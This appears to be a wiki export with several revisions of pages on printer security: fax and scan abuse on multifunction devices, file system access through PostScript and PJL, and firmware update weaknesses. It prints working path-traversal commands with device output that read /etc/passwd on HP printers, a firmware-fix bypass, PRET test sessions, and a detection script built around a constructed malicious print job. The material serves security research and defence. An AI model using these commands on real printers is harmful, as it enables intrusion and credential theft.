]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] has reverse engineered some scanners. On Brother devices, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. 8a9824be184d131e9597607ac03ae35c4f4d4411 34 33 2017-01-05T11:16:30Z 77.181.97.62 0 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>Adobe Systems Inc., ''PostScript Language Reference Manual Supplement for Version 2016'', (1995), 18-35.</ref>, allowing compatible devices to '''inbound''' receive PostScript files directly via fax. 
This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages are nowadays typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) 
]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] has reverse engineered some scanners. On Brother devices, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. db717428d92d608bb304a8f32bebea2a4e8ee888 33 2017-01-05T11:15:38Z 77.181.97.62 0 Created page with "While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or..." wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. == Telefax == Telefax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. 
In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>Adobe Systems Inc., ''PostScript Language Reference Manual Supplement for Version 2016'', (1995), 18-35.</ref>, allowing compatible devices to '''inbound''' receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages are nowadays typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) 
]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] has reverse engineered some scanners. On Brother devices, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. f0c65ac88a81329f5a215c484a043d1a0099a51d File system access 0 51 639 636 2017-07-20T09:53:44Z Admin 1 wikitext text/x-wiki If an attacker has read access to the file system, she can potentially retrieve sensitive information like configuration files or stored print jobs. Manipulation of files through write access might even lead to remote code execution – for example by editing ''rc'' scripts or replacing binary files to be executed. Therefore printers should never allow direct access to the file system. However, legitimate language constructs are defined for PostScript <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992, p. 71-80</ref> and PJL <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 9</ref> to do exactly this. Such features exist for historic reasons when bandwidth was a major bottleneck. 
Frequently used fonts and graphics are downloaded to the device once and can be re-used in further print jobs. While such functionality enhances printing performance, it poses a severe security risk to networked devices.

== PostScript ==
The potential danger of PostScript file I/O primitives has been pointed out by <ref>''[https://www.cs.plu.edu/courses/CompSec/arts/mal.pdf Malicious Data and Computer Security]'', W. Sibert, Proceedings of the 19th National Information Systems Security Conference, 1996</ref>. An effort to systematically exploit PostScript functions to access the file system of printer devices has been made by <ref name="mueller2016printers">''Exploiting Network Printers'', J. Müller, 2016, p. 48-50</ref>. Example code to access the file system with PostScript on a ''HP LaserJet 4200N'' is given below; lines starting with > are sent to the printer, lines starting with < are its responses:

<syntaxhighlight lang=postscript>
> /str 256 string def (%*%../*)        % list all files
> {==} str filenameforall
< (%disk0%../webServer/home/device.html)
< (%disk0%../webServer/.java.login.config)
< (%disk0%../webServer/config/soe.xml)
> /byte (0) def                        % read from file
> /infile (../../../etc/passwd) (r) file def
> { infile read {byte exch 0 exch put
>   (%stdout) (w) file byte writestring}
>   {infile closefile exit} ifelse
> } loop
< root::0:0::/:/bin/dlsh
> /outfile (test.txt) (w+) file def    % write to file
> outfile (Hello World!) writestring
> outfile closefile
</syntaxhighlight>

Accessing files with PostScript is supported by a large variety of printers, but is usually sandboxed to a certain directory. This limits an attacker to mostly harmless actions like font modification. There are however exceptions:

* Various '''HP LaserJet printers''' are prone to path traversal which allows access to the whole file system. This issue, which affects almost forty HP devices, has been discussed in [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5221 CVE-2012-5221] and is fixed in current firmware versions. The protection mechanism however is flawed, as shown in <ref name="mueller2016printers"/>: by using <code>%*%</code> as disk prefix and replacing <code>../</code> with <code>.././</code> one is able to access the whole file system even on the latest firmware versions. The impact is significant: passwords for the embedded web server can be found in <code>/dev/rdsk_jdi_cfg0</code>, while the RAM is available for reading and writing at <code>/dev/dsk_ram0</code>.
* Various '''OKI laser printers''' allow one level of path traversal, where a directory called ‘hidden’ is located which contains stored fax numbers, email contacts and local users' PINs as well as the SNMP community string and password. More interesting however is the fact that such an MFP can be integrated into a network using features like Email-to-Print or Scan-to-FTP. Therefore we can find the passwords for LDAP, POP3, SMTP, outbound HTTP proxy, FTP, SMB and WebDAV as well as the IPsec and Wi-Fi pre-shared keys. This is a good example of how an attacker can escalate her way into a company's network, using the printer device as a starting point.

'''How to test for this attack?''' File system access has been implemented in [[PRET]] in ''ps'' mode using the <code>ls</code>, <code>get</code>, <code>put</code>, <code>append</code>, <code>delete</code>, <code>rename</code>, <code>find</code>, <code>mirror</code>, <code>touch</code>, <code>mkdir</code>, <code>cd</code>, <code>pwd</code>, <code>chvol</code>, <code>traversal</code>, <code>format</code>, <code>fuzz</code> and <code>df</code> commands:

 ./pret.py -q printer ps
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> ls ../..
 d - Jan 1 1970 (created Jan 1 1970) bootdev
 d - Jan 1 1970 (created Jan 1 1970) dsk_jdi
 d - Jan 1 1970 (created Jan 1 1970) dsk_jdi_ss
 d - Jan 1 1970 (created Jan 1 1970) dsk_ram0
 d - Jan 1 1970 (created Jan 1 1970) etc
 d - Jan 1 1970 (created Jan 1 1970) tmp
 d - Jan 1 1970 (created Jan 1 1970) webServer

'''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

== PJL ==
Accessing arbitrary files on a printer with PJL has first been demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref>, who wrote the [[PFT|PFT and Hijetter]] programs to perform file operations on HP LaserJets using legitimate PJL commands. A virtual, distributed file system based on PJL has been proposed and implemented by <ref>''[http://www.remote-exploit.org/articles/printfs/ Printers Gone Wild]'', B. Smith, ShmooCon, 2011</ref>. Example code to access the file system with PJL on a ''HP LaserJet 4200N'' is given below; lines starting with > are sent to the printer, lines starting with < are its responses:

 > @PJL FSDIRLIST NAME="0:\" ENTRY=1 COUNT=65535       (list all files)
 < .\:\:TYPE=DIR
 < ..\:\:TYPE=DIR
 < PostScript TYPE=DIR
 < PJL TYPE=DIR
 < saveDevice TYPE=DIR
 < webServer TYPE=DIR
 > @PJL FSQUERY NAME="0:\..\..\etc\passwd"             (read from file)
 < @PJL FSQUERY NAME="0:\..\..\etc\passwd" TYPE=FILE SIZE=23
 > @PJL FSUPLOAD NAME="0:\..\..\etc\passwd" OFFSET=0 SIZE=23
 < root::0:0::/:/bin/dlsh
 > @PJL FSDOWNLOAD SIZE=13 NAME="0:\test.txt"          (write to file)
 > Hello World!

Accessing files with PJL is supported by only a few printers. Examples are given below:

* Various '''HP LaserJet''' printers are prone to path traversal which allows access to the whole file system (see [http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4107 CVE-2010-4107]). The countermeasure proposed by HP is to enable disk lock <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref>, which can easily be broken either by resetting the device to [[factory defaults]] or by performing [[Credential disclosure#Brute-Force_Attacks|brute-force attacks]].
* Various '''HP OfficeJet Pro''' and '''PageWide Pro''' models allow attackers to read arbitrary files from the Linux-based file system. Furthermore, a path traversal vulnerability exists which enables attackers to place a shell script in <code>0:/../../rw/var/etc/profile.d/</code>, reboot the device (for example, using [[Factory_defaults#SNMP|SNMP]]) and thereby execute arbitrary commands <ref>''[https://www.tenable.com/blog/rooting-a-printer-from-security-bulletin-to-remote-code-execution Rooting a Printer: From Security Bulletin to Remote Code Execution]'', Jacob Baines, 2017</ref>.
* For various '''Konica Minolta bizhub''' MFPs the contents of the root directory – which is a typical Linux file system – can be listed. One interesting file which can be read and written is <code>/../sysdata/acc/job.csv</code>, which contains logged print job metadata, including document titles and usernames.

'''How to test for this attack?''' File system access has been implemented in [[PRET]] in ''pjl'' mode using the <code>ls</code>, <code>get</code>, <code>put</code>, <code>append</code>, <code>delete</code>, <code>find</code>, <code>mirror</code>, <code>touch</code>, <code>mkdir</code>, <code>cd</code>, <code>pwd</code>, <code>chvol</code>, <code>traversal</code>, <code>format</code>, <code>fuzz</code> and <code>df</code> commands:

 ./pret.py -q printer pjl
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> ls ..
 d - bootdev
 d - dsk_jdi
 d - dsk_jdi_ss
 d - dsk_ram0
 d - etc
 d - lrt
 d - tmp
 d - webServer
 d - xps

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

----
35210e99ba8661c5e4a697dc861ae900537e807f

636 227 2017-07-02T17:44:34Z Admin 1 wikitext text/x-wiki

If an attacker has read access to the file system, she can potentially retrieve sensitive information like configuration files or stored print jobs. Manipulation of files through write access might even lead to remote code execution, for example by editing ''rc'' scripts or replacing binary files that the device executes. Therefore printers should never allow direct access to the file system. However, legitimate language constructs are defined for PostScript <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992, p. 71-80</ref> and PJL <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 9</ref> to do exactly this. Such features exist for historic reasons, from a time when bandwidth was a major bottleneck: frequently used fonts and graphics are downloaded to the device once and can be re-used in subsequent print jobs. While such functionality enhances printing performance, it poses a severe security risk to networked devices.

== PostScript ==

The potential danger of PostScript file I/O primitives has been pointed out by <ref>''[https://www.cs.plu.edu/courses/CompSec/arts/mal.pdf Malicious Data and Computer Security]'', W. Sibert, Proceedings of the 19th National Information Systems Security Conference, 1996</ref>. An effort to systematically exploit PostScript functions to access the file system of printer devices has been made by <ref name="mueller2016printers">''Exploiting Network Printers'', J. Müller, 2016, p. 48-50</ref>.

Example code to access the file system with PostScript on an ''HP LaserJet 4200N'' is given below. Lines starting with <code>></code> are sent to the printer, lines starting with <code><</code> are its responses:

<syntaxhighlight lang=postscript>
> /str 256 string def (%*%../*)          % list all files
> {==} str filenameforall
< (%disk0%../webServer/home/device.html)
< (%disk0%../webServer/.java.login.config)
< (%disk0%../webServer/config/soe.xml)
> /byte (0) def                          % read from file
> /infile (../../../etc/passwd) (r) file def
> { infile read {byte exch 0 exch put
>   (%stdout) (w) file byte writestring}
>   {infile closefile exit} ifelse
> } loop
< root::0:0::/:/bin/dlsh
> /outfile (test.txt) (w+) file def      % write to file
> outfile (Hello World!) writestring
> outfile closefile
</syntaxhighlight>

Accessing files with PostScript is supported by a large variety of printers, but is usually sandboxed to a certain directory. This limits the possibilities of an attacker to mostly harmless actions like font modification. There are however exceptions:

* Various '''HP LaserJet printers''' are prone to path traversal which allows access to the whole file system. This issue, which affects almost forty HP devices, has been discussed in [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5221 CVE-2012-5221] and is fixed in current firmware versions. The protection mechanism however is flawed, as shown in <ref name="mueller2016printers"/>: by using <code>%*%</code> as disk prefix and replacing <code>../</code> with <code>.././</code> one is able to access the whole file system even on the latest firmware versions. The impact is significant: passwords for the embedded web server can be found in <code>/dev/rdsk_jdi_cfg0</code>, while the RAM is available for reading and writing at <code>/dev/dsk_ram0</code>.
* Various '''OKI laser printers''' allow one level of path traversal, where a directory called ‘hidden’ is located which contains stored fax numbers, email contacts and local users' PINs as well as the SNMP community string and password. More interesting however is the fact that this MFP can be integrated into a network using features like Email-to-Print or Scan-to-FTP. Therefore we can find the passwords for LDAP, POP3, SMTP, outbound HTTP proxy, FTP, SMB and WebDAV as well as the IPsec and Wi-Fi pre-shared keys. This is a good example of how an attacker can escalate her way into a company's network, using the printer device as a starting point.

'''How to test for this attack?'''

File system access has been implemented in [[PRET]] in ''ps'' mode using the <code>ls</code>, <code>get</code>, <code>put</code>, <code>append</code>, <code>delete</code>, <code>rename</code>, <code>find</code>, <code>mirror</code>, <code>touch</code>, <code>mkdir</code>, <code>cd</code>, <code>pwd</code>, <code>chvol</code>, <code>traversal</code>, <code>format</code>, <code>fuzz</code> and <code>df</code> commands:

 ./pret.py -q printer ps
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> ls ../..
 d -  Jan 1 1970 (created Jan 1 1970) bootdev
 d -  Jan 1 1970 (created Jan 1 1970) dsk_jdi
 d -  Jan 1 1970 (created Jan 1 1970) dsk_jdi_ss
 d -  Jan 1 1970 (created Jan 1 1970) dsk_ram0
 d -  Jan 1 1970 (created Jan 1 1970) etc
 d -  Jan 1 1970 (created Jan 1 1970) tmp
 d -  Jan 1 1970 (created Jan 1 1970) webServer

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

== PJL ==

The issue of accessing arbitrary files on a printer with PJL was first demonstrated by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref>, who wrote the [[PFT|PFT and Hijetter]] programs to perform file operations on HP LaserJets using legitimate PJL commands. A virtual, distributed file system based on PJL has been proposed and implemented by <ref>''[http://www.remote-exploit.org/articles/printfs/ Printers Gone Wild]'', B. Smith, ShmooCon, 2011</ref>.
Example code to access the file system with PJL on an ''HP LaserJet 4200N'' is given below. Lines starting with <code>></code> are sent to the printer, lines starting with <code><</code> are its responses; the notes in parentheses are comments, not part of the commands:

 > @PJL FSDIRLIST NAME="0:\" ENTRY=1 COUNT=65535       (list all files)
 < .\:\:TYPE=DIR
 < ..\:\:TYPE=DIR
 < PostScript TYPE=DIR
 < PJL TYPE=DIR
 < saveDevice TYPE=DIR
 < webServer TYPE=DIR
 > @PJL FSQUERY NAME="0:\..\..\etc\passwd"             (read from file)
 < @PJL FSQUERY NAME="0:\..\..\etc\passwd" TYPE=FILE SIZE=23
 > @PJL FSUPLOAD NAME="0:\..\..\etc\passwd" OFFSET=0 SIZE=23
 < root::0:0::/:/bin/dlsh
 > @PJL FSDOWNLOAD SIZE=13 NAME="0:\test.txt"          (write to file)
 > Hello World!

Accessing files with PJL is supported by only a few printers. Examples are given below:

* Various '''HP LaserJet printers''' are prone to path traversal which allows access to the whole file system (see [http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4107 CVE-2010-4107]). The countermeasure proposed by HP is to enable disk lock <ref>''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c02004333 Security Bulletin HPSBPI02575 SSRT090255 Rev. 1]'', HP Inc., 2010</ref>, which can easily be broken either by resetting the device to [[factory defaults]] or by performing [[Credential disclosure#Brute-Force_Attacks|brute-force attacks]].
* Various '''HP OfficeJet Pro''' and '''PageWide Pro''' models allow attackers to read arbitrary files from the Linux based file system. Furthermore, a path traversal vulnerability exists which enables attackers to place a shell script in <code>0:/../../rw/var/etc/profile.d/</code>, reboot the device (for example, using [[Factory_defaults#SNMP|SNMP]]) and therefore execute arbitrary commands <ref>''[https://www.tenable.com/blog/rooting-a-printer-from-security-bulletin-to-remote-code-execution Rooting a Printer: From Security Bulletin to Remote Code Execution]'', Jacob Baines, 2017</ref>.
* For various '''Konica Minolta bizhub''' MFPs the contents of the root directory, which is a typical Linux file system, can be listed. One interesting file which can be read and written is <code>/../sysdata/acc/job.csv</code>, which contains logged print job metadata, including document titles and usernames.

'''How to test for this attack?'''

File system access has been implemented in [[PRET]] in ''pjl'' mode using the <code>ls</code>, <code>get</code>, <code>put</code>, <code>append</code>, <code>delete</code>, <code>find</code>, <code>mirror</code>, <code>touch</code>, <code>mkdir</code>, <code>cd</code>, <code>pwd</code>, <code>chvol</code>, <code>traversal</code>, <code>format</code>, <code>fuzz</code> and <code>df</code> commands:

 ./pret.py -q printer pjl
 Connection to printer established
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> ls ..
 d - bootdev
 d - dsk_jdi
 d - dsk_jdi_ss
 d - dsk_ram0
 d - etc
 d - lrt
 d - tmp
 d - webServer
 d - xps

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

----
d544a2828ddc5bdc5b1867bc3cf40a864e81bef2
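Both the PostScript and the PJL constructs described on this page leave recognisable traces in the job data itself, so a print server hook or a sensor watching port 9100 can flag them before they reach the device. The following Python scanner is an added example for this page, not code from PRET or from any printer vendor: it looks for the PJL file system commands defined in chapter 9 of the PJL reference and for PostScript file operators, and reports whether the referenced path escapes its directory through <code>..</code> segments, including the <code>.././</code> and <code>%*%</code> variants discussed above. The sample job it scans is constructed for the example; the command and operator names are real, everything else (function names, the <code>Finding</code> record) is the example's own.

```python
"""Scan a raw print job for PostScript and PJL file system access.

Added example for this wiki page (not part of PRET or any vendor tool).
Intended for a print server hook or a sensor on port 9100 traffic.
"""
import re
from dataclasses import dataclass

# PJL file system commands (HP PJL Technical Reference Manual, chapter 9).
PJL_FS_COMMANDS = (b"FSAPPEND", b"FSDELETE", b"FSDIRLIST", b"FSDOWNLOAD",
                   b"FSINIT", b"FSMKDIR", b"FSQUERY", b"FSUPLOAD")
PJL_FS_RE = re.compile(
    rb'@PJL\s+(?P<cmd>' + b"|".join(PJL_FS_COMMANDS) + rb')\b'
    rb'(?:[^\r\n]*?NAME\s*=\s*"(?P<name>[^"]*)")?',
    re.IGNORECASE)

# PostScript: "(path) (mode) file" opens a file; the other operators list,
# delete or rename files without going through `file`.
PS_FILE_RE = re.compile(
    rb'\((?P<path>[^()]*)\)\s*\((?P<mode>r\+?|w\+?|a\+?)\)\s*file\b')
PS_FILE_OPS_RE = re.compile(rb'\b(filenameforall|deletefile|renamefile)\b')

# PostScript special files that do not refer to the file system.
PS_SPECIAL_FILES = (b"%stdin", b"%stdout", b"%stderr", b"%lineedit",
                    b"%statementfile")


def is_traversal(path: bytes) -> bool:
    """True if the path escapes its starting directory through a '..'
    segment. A leading PostScript device prefix such as %disk0% or %*% is
    stripped first and PJL backslashes are treated like slashes, so
    "0:\\..\\..\\etc\\passwd", "../x" and ".././x" are all caught."""
    path = re.sub(rb'^%[^%]*%', b"", path)
    segments = path.replace(b"\\", b"/").split(b"/")
    return b".." in segments


@dataclass
class Finding:
    language: str   # "PJL" or "PostScript"
    operation: str  # PJL command or PostScript operator
    path: str       # referenced path, empty if not captured
    traversal: bool


def scan_print_job(job: bytes) -> list:
    """Return every file system access found in the raw job data."""
    findings = []
    for m in PJL_FS_RE.finditer(job):
        name = m.group("name") or b""
        findings.append(Finding("PJL", m.group("cmd").decode().upper(),
                                name.decode(errors="replace"),
                                is_traversal(name)))
    for m in PS_FILE_RE.finditer(job):
        path = m.group("path")
        if path in PS_SPECIAL_FILES:
            continue
        findings.append(Finding("PostScript",
                                "file (" + m.group("mode").decode() + ")",
                                path.decode(errors="replace"),
                                is_traversal(path)))
    for m in PS_FILE_OPS_RE.finditer(job):
        findings.append(Finding("PostScript", m.group(1).decode(), "", False))
    return findings


def traversal_findings(job: bytes) -> list:
    """Only the accesses that leave their directory (the ones worth an alert)."""
    return [f for f in scan_print_job(job) if f.traversal]


# Constructed sample job (not captured from a real device): a PJL prologue
# that reads /etc/passwd through path traversal, followed by a PostScript
# part that does the same and additionally opens a font file legitimately.
SAMPLE_JOB = (
    b"\x1b%-12345X@PJL JOB\r\n"
    b"@PJL SET COPIES=1\r\n"
    b'@PJL FSQUERY NAME="0:\\..\\..\\etc\\passwd"\r\n'
    b'@PJL FSUPLOAD NAME="0:\\..\\..\\etc\\passwd" OFFSET=0 SIZE=23\r\n'
    b"@PJL ENTER LANGUAGE=POSTSCRIPT\r\n"
    b"%!PS\n"
    b"/infile (../../../etc/passwd) (r) file def\n"
    b"(%stdout) (w) file (hello) writestring\n"
    b"/fontfile (fonts/custom.pfb) (r) file def\n"
    b"\x1b%-12345X"
)

if __name__ == "__main__":
    for f in scan_print_job(SAMPLE_JOB):
        flag = "TRAVERSAL" if f.traversal else "fs-access"
        print(f"{flag:9} {f.language:10} {f.operation:12} {f.path}")
```

A sandbox-relative font access is reported as plain file system access, while the three <code>/etc/passwd</code> reads are reported as traversal; a print server would typically reject or quarantine a job with traversal findings and merely log the rest.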
Firmware updates 0 44 638 321 2017-07-03T15:46:28Z Admin 1 /* Epson */ wikitext text/x-wiki

The dangers of malicious firmware updates are well-known and were discussed early on by <ref>''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412</ref> and <ref>''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006</ref>. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions, but it seems logical that historic reasons play a role: printers used to be connected by parallel or USB cable. Without network connectivity, security was less important, and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device.

Firmware modification attacks against network printers have been demonstrated by <ref name="cui2011print">''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011</ref> for HP devices, by <ref name="jordon2014wrestling">''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014</ref> for the Canon PIXMA series and by <ref name="heiland2011patched">''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011</ref> and <ref name="weidenbach2016pwn">''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016</ref> for various Xerox models. As a countermeasure, printer manufacturers started to digitally sign their firmware <ref name="hp2012rfu">''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012</ref>.

== Vendors ==

To give an overview of firmware deployment procedures, 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 56-58</ref>. The results are as follows.

=== HP ===

Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP.
419 files in HP's traditional remote firmware update (<code>.rfu</code>) format and 206 newer ‘HP FutureSmart’ binaries (<code>.bdl</code>) can be retrieved. The <code>.rfu</code> files contain proprietary PJL commands like <code>@PJL UPGRADE SIZE=…</code>, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by <ref name="cui2011print"/> and caused HP to digitally sign all their printer firmware since March 2012 <ref name="hp2012rfu"/>.

=== Canon ===

Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number to download any firmware. According to <ref name="jordon2014wrestling"/>, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’.

=== Epson ===

Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting <code>.exe</code> files and can be unpacked using ''unp''<ref>''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath</ref>. The contained <code>.efu</code> files can be analyzed using ''Binwalk''<ref>''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner</ref>, which extracts the actual firmware. One can obtain 49 <code>.rcx</code> files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine <code>.prn</code> files containing PJL commands (<code>@PJL ENTER LANGUAGE=DOWNLOAD</code>). Epson has not published any information on protection mechanisms. Firmware released before 2016 did not apply code signing and could be manipulated as shown by <ref>''[https://os-s.de/advisories/OSS-2016-19_epson-mfp.pdf Epson WorkForce Lack Of Firmware Signing / CSRF]'', R. Spenneberg</ref>. They ‘believe huge amounts of the devices produced since 1999 […] could be vulnerable’.

=== Dell ===

